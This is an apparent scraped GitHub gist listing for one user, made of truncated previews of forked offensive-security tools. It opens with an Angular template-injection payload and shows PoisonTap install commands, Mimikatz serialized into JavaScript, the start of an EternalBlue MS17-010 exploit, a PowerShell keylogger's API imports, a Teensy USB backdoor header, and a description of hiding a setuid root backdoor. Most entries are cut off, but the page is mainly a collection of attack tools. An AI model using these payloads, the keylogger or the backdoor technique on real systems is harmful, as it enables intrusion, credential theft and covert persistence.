{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
Anthony Bordel minkione
minkione
/ samsung_remote.py
Created
February 20, 2017 07:18
— forked from danielfaust/samsung_remote.py
Samsung TV Remote Control Python Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import socket | |
| import base64 | |
| src = '192.168.1.2' # ip of remote | |
| mac = '00-AB-11-11-11-11' # mac of remote | |
| remote = 'python remote' # remote name | |
| dst = '192.168.1.3' # ip of tv | |
| app = 'python' # iphone..iapp.samsung |
minkione
/ Pi.txt
Created
February 21, 2017 10:09
— forked from jgamblin/Pi.txt
PoisonTap Install Commands
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##Server: | |
| sudo apt-get update && apt-get upgrade | |
| sudo apt-get install screen nodejs nodejs-legacy git npm | |
| sudo npm install websocket | |
| git clone https://github.com/samyk/poisontap | |
| screen | |
| sudo node backend_server.js | |
| ##piZero: | |
| sudo apt-get update && apt-get upgrade |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; |
minkione
/ diff-pnp-devices.ps1
Created
March 26, 2017 06:40
— forked from JamesHabben/diff-pnp-devices.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "Written by James Habben (@JamesHabben)" | |
| "Last Updated: 2016-10-18" | |
| "" | |
| "" | |
| "Start with device not inserted. Remove it now if it is in already." | |
| read-host "press enter to continue" | |
| $devices1 = Get-WmiObject Win32_PNPEntity | |
| " Total devices before: {0}" -f $devices1.count |
minkione
/ AngularTI.md
Created
April 11, 2017 07:22
— forked from mccabe615/AngularTI.md
Angular Template Injection Payloads
minkione
/ katz.js
Created
May 2, 2017 10:40
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialized_obj = [ | |
| 0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
| 101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
| 101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
| 68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
| 103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
| 122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
| 101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
| 0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |
minkione
/ eternalblue_exploit.py
Last active
November 1, 2024 23:12
— forked from worawit/eternalblue7_exploit.py
MS17-010 NSA SHADOW BROKERS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
minkione
/ gist:49e5d6233f4195b83eba8ec2f83b99d4
Created
May 18, 2017 12:55
— forked from dasgoll/gist:7ca1c059dd3b3fbc7277
Simple Windows Keylogger using PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -Version 2 | |
| function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
| { | |
| # Signatures for API Calls | |
| $signatures = @' | |
| [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
| public static extern short GetAsyncKeyState(int virtualKeyCode); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] | |
| public static extern int GetKeyboardState(byte[] keystate); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] |
minkione
/ backdoor.ino
Created
May 19, 2017 05:55
— forked from coldfusion39/backdoor.ino
Teensy code for backdooring USB devices
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Copyright (c) 2017, Brandan Geise [coldfusion] | |
| // | |
| // Permission is hereby granted, free of charge, to any person obtaining a copy | |
| // of this software and associated documentation files (the "Software"), to deal | |
| // in the Software without restriction, including without limitation the rights | |
| // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
| // copies of the Software, and to permit persons to whom the Software is | |
| // furnished to do so, subject to the following conditions: | |
| // | |
| // The above copyright notice and this permission notice shall be included in all |
minkione
/ setuid-root-backdoor.md
Created
May 22, 2017 08:30
How to use setuid to install a root backdoor.
Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.
While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account from the system (including www-data, which you might not even know if compromised).
If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur